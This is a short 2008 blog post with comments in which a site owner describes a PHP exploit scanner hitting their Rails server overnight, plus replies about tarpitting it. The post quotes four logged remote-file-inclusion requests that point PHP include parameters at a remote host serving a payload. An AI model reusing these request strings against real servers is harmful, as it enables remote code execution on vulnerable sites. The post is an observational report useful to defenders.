Friday, August 01, 2008

Morfeus Fucking Scanner

Pleas excuse the profane title, it's the string that an entity identified itself with that hit up out server a few hundred times over a period of several seconds during the night. A little googling reveals it to be a PHP vulnerability exploit scanner.



I thought it was funny that they'd be so blatent, but also because our site is a Ruby on Rails application and as such is invulnerable to PHP exploits. It was hitting up URLs like this is rapid succession:

/www/lib/head_auth.php?CFG[PREPEND_FILE]=http://69.46.228.240/dotproject/includes/1.gif?/

/webcalendar/tools/send_reminders.php?includedir=http://69.46.228.240/dotproject/includes/1.gif?/

/templates/mangobery/footer.sample.php?Site_Path=http://69.46.228.240/dotproject/includes/1.gif?/

/tools/update_translations.php?_SESSION[path]=http://69.46.228.240/dotproject/includes/1.gif?/

Anyway, to the script kiddie who was running box 80.98.255.56, can't blame you for trying hey :)

2 comments:

vänsterwiki said...

Was on my server too... I tarpit them in my router. Less strain on my logs!

beet said...

@vänsterwiki yeah, we should do the same but it only happened to us the one time. I think they might have given up because we just returned the same error message with HTTP status 500 to each request.